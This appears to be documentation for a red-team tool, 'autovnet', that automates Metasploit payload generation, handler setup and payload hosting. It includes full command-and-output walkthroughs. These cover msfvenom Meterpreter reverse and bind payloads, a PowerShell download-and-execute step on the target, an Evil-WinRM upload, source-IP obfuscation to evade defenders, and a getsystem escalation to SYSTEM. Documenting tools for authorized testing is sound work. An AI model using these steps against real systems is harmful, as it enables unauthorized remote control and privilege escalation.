# Metasploit

[TOC]

## [Metasploit Framework (`msf`)](https://docs.rapid7.com/metasploit/msf-overview/)

The `msf` integration enables configuring any `msfvenom` reverse or bind payload via `autovnet`, which provides
* payload tracking by codename
* source IP obfuscation for bind payloads
* automatic C2 provisioning for reverse payloads
* easy payload sharing

### `.proxy-msf`

If you want to use any of Metasploit's built in scanners, etc. that connect to a target machine, try using `.proxy-msf` in place of `msfconsole`.

```bash
.proxy-msf
msf6 >
```

It _is_ `msfconsole`, but proxychain'ed behind `autovnet` for source IP randomization.

### msf reverse

`autovnet rtfm msf reverse` is an extremely powerful command that can be a huge time saver.

It generates an `msfvenom` payload (of the type you specify), configures and starts the handler required to catch the session, and saves everything for later by codename so you can trivially re-start this exact handler.

That's right: _no more forgetting how you configured your payloads_!

The output below is seperated and annotated to indiciate what generated it.

The default payload is currently a Windows payload.

First, `msfvenom` will generate it for us:
```bash
$ autovnet rtfm msf reverse -f exe
##### OUTPUT FROM MSFVENOM #####
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201308 bytes
Final size of exe file: 207872 bytes
Saved as: /opt/rtfm/msf/luxuriant_present/luxuriant_present.exe
```

Next, `autovnet` will print the full path to the payload, and some helpful commands we will refer to later.
```bash
##### OUTPUT FROM AUTOVNET #####
[+] autovnet rtfm listen luxuriant_present
[+] ==================== [luxuriant_present] ====================
[+] payload : /opt/rtfm/msf/luxuriant_present/luxuriant_present.exe
[+] share   : autovnet rtfm share --msf luxuriant_present
[+] handle  : autovnet rtfm msf handle luxuriant_present
[+] ==================== [luxuriant_present] ====================
[+] luxuriant_present | 10.232.30.245:443 => 127.1.33.7:65459
```

Finally, `msfconsole` starts and is configured (using generated `.rc` scripts) to match the payload we just generated.
```bash
##### OUTPUT FROM MSFCONSOLE #####
[-] Cannot find resource script: /opt/rtfm/msf/luxuriant_present/vars.rc
[*] Processing /opt/rtfm/msf/luxuriant_present/handle.rc for ERB directives.
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> set payload windows/x64/meterpreter_reverse_https
payload => windows/x64/meterpreter_reverse_https
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> set LHOST 10.232.30.245
LHOST => 10.232.30.245
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> set SRVHOST 10.232.30.245
SRVHOST => 10.232.30.245
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> set ReverseListenerBindAddress 127.1.33.7
ReverseListenerBindAddress => 127.1.33.7
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> set LPORT 65459
LPORT => 65459
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> set SRVPORT 443
SRVPORT => 443
resource (/opt/rtfm/msf/luxuriant_present/handle.rc)> run
[*] Started HTTPS reverse handler on https://127.1.33.7:65459
```

At this point, `msfconsole` is waiting for the payload to connect.

As the Red Teamer, it is our turn to transfer the payload to the target system and execute it.

In the output above, a `share` command was printed that includes our codename, `luxuriant_present`

We can run it to start a `share` (file server) serving the payload we generated:

```bash
$ autovnet rtfm share --msf luxuriant_present
[+] autovnet rtfm share messy_clerk
[+] =======================================
[+] Sharing: /tmp/rtfm_share_kh8i71bv
   [*] staged   : /luxuriant_present.exe ( /opt/rtfm/msf/luxuriant_present/luxuriant_present.exe )
   [+] download : autovnet rtfm download https://10.199.44.91/luxuriant_present.exe
[+] =======================================
[+] http://10.224.91.178
[+] =======================================
[+] https://10.199.44.91
[+] =======================================
Creating network "rtfm_share_42371_59263_default" with the default driver
Creating rtfm_share_42371_59263_file_server_1 ... done
Attaching to rtfm_share_42371_59263_file_server_1
file_server_1  | 2021/12/13 21:12:07 [+] Waiting for requests...
```

You may wonder:
> Why does the `share` have the codename `messy_clerk`, while the payload's codename is `luxuriant_present`?

That's because `autovnet rtfm share --msf luxuriant_present` means
> Serve `luxuriant_present` using a random, emphemeral server

while `autovnet rtfm share messy_clerk` means
> Re-create that file server we used to have that served `luxuriant_present.exe` on URLs `http://10.224.91.178` and `https://10.199.44.91`

Both are valid, and the one you should use depends on how you want to look to the Blue Team.

Re-running `autovnet rtfm share --msf luxuriant_present` makes you 1 actor with 2 payload servers,
while `autovnet rtfm share messy_clerk` would make you 1 actor with 1 payload server.


Regardless, we now have a url hosting our payload: `http://10.224.91.178/luxuriant_present.exe`
(we'll use the HTTP URL in this example due to `powershell` limitations).

```powershell
# Target - Download and Execute
PS C:\> iwr http://10.224.91.178/luxuriant_present.exe -OutFile luxuriant_present.exe
PS C:\> ./luxuriant_present.exe
```

Which should be immediately caught by our listener:
```bash
...
[*] Started HTTPS reverse handler on https://127.1.33.7:65459
[!] https://127.1.33.7:65459 handling request from 127.0.0.1; (UUID: ao8cpe5l) Without a database connected that payload UUID tracking will not work!
[*] https://127.1.33.7:65459 handling request from 127.0.0.1; (UUID: ao8cpe5l) Redirecting stageless connection from /YaCi_jEqypy7JLom2pMCZg_Axk1amsIKO00Y5YhbepGBA1BeTyjcx093ckvqkZ1xRr2lSgJy36ZEm93K2gJ49hTjH1vjucaV2Zq0lf3hOnnhCcE8-kHkzkaD8tv1m with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[!] https://127.1.33.7:65459 handling request from 127.0.0.1; (UUID: ao8cpe5l) Without a database connected that payload UUID tracking will not work!
[*] https://127.1.33.7:65459 handling request from 127.0.0.1; (UUID: ao8cpe5l) Attaching orphaned/stageless session...
[!] https://127.1.33.7:65459 handling request from 127.0.0.1; (UUID: ao8cpe5l) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (127.1.33.7:65459 -> 127.0.0.1 ) at 2021-12-13 16:21:06 -0500
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
You can then full exit out of `msfconsole` with `exit`, `exit`.

To restart the listener, simply use the `handle` command that `autovnet` printed:

```bash
$ autovnet rtfm msf handle luxuriant_present
[+] luxuriant_present | 10.232.30.245:443 => 127.1.33.7:65459
...
[*] Started HTTPS reverse handler on https://127.1.33.7:65459
```

If you re-execute the payload (or if it is still running on the target), it should open a new session.

### msf bind

`autovnet rtfm msf bind` is very similar to [msf reverse](#msf-reverse), but for bind-type payloads.

When you "handle" / connect to a bind payload, the connection is proxied through `autovnet` using a random source IP.

Since `autovnet` is creating a handler for you, you need to tell `autovnet` where you plan on installing the bind payload,
and confirm when it is ready to try to connect to it.

In this example, our Windows target has a DNS name / `/etc/hosts` entry of `win-target`:

```bash
$ autovnet rtfm msf bind -f exe -r win-target
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes
Saved as: /opt/rtfm/msf/maddening_major/maddening_major.exe
[+] ==================== [maddening_major] ====================
[+] payload : /opt/rtfm/msf/maddening_major/maddening_major.exe
[+] share   : autovnet rtfm share --msf maddening_major
[+] handle  : autovnet rtfm msf handle maddening_major
[+] ==================== [maddening_major] ====================
[!] Install the payload on win-target, then press <ENTER> to connect>
```

Notice that you are prompted to press `<ENTER>` when you are ready to connect.
If you accidentally press enter too early, you can always use the handle command
(e.g. `autovnet rtfm msf handle maddening_major`) to retry when you are ready
```


This time, let's use `.proxy-winrm` to upload our payload:
```bash
$ .proxy-winrm -u Administrator -i win-target
Enter Password:

Evil-WinRM shell v3.3
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\
*Evil-WinRM* PS C:\> upload /opt/rtfm/msf/maddening_major/maddening_major.exe C:\maddening_major.exe
Info: Uploading /opt/rtfm/msf/maddening_major/maddening_major.exe to C:\maddening_major.exe


Data: 275796 bytes of 275796 bytes copied

Info: Upload successful!
```

We can also execute it through our `evil-winrm` shell.
Note that `./example.exe` seems to work well, but `.\example.exe` does not seem to execute the file. YMMV.

It should background itself, but still be running in the process list.
```bash
*Evil-WinRM* PS C:\> ./maddening_major.exe
*Evil-WinRM* PS C:\> tasklist /v | findstr maddening_major
maddening_major.exe           2756 Services                   0      3,360 K Unknown         WIN-XXXXXXXXX\Administrator                           0:00:00 N/A
```

Then, we can return to our waiting handler and press `<ENTER>` to connect to our newly installed backdoor:
```bash
...
[!] Install the payload on win-target, then press <ENTER> to connect>
[-] Cannot find resource script: /opt/rtfm/msf/maddening_major/vars.rc
[*] Processing /opt/rtfm/msf/maddening_major/handle.rc for ERB directives.
resource (/opt/rtfm/msf/maddening_major/handle.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/opt/rtfm/msf/maddening_major/handle.rc)> set payload windows/x64/meterpreter_bind_tcp
payload => windows/x64/meterpreter_bind_tcp
resource (/opt/rtfm/msf/maddening_major/handle.rc)> set RHOST win-target
RHOST => win-target
resource (/opt/rtfm/msf/maddening_major/handle.rc)> set LPORT 3398
LPORT => 3398
resource (/opt/rtfm/msf/maddening_major/handle.rc)> run
[*] Started bind TCP handler against win-target:3398
[*] Meterpreter session 1 opened (192.168.50.5:48626 -> 10.255.93.118:1080 ) at 2021-12-13 16:37:37 -0500

meterpreter >
```

